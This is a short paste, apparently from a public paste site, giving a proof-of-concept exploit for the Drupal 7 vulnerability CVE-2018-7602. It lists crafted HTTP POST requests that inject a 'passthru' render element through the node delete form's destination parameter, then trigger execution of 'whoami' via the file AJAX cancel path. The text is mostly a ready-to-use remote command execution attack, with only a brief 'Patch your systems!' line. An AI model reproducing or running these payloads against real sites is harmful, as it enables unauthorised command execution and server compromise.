Drupal 7 exploit
a guest Apr 25th, 2018 11,330 Never
- This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
- You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
- POST /?q=node/99/delete&destination=node?q[%2523]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
- Retrieve the form_build_id from the response, and then triggering the exploit with :
- POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
- This will display the result of the whoami command.
- Patch your systems!
RAW Paste Data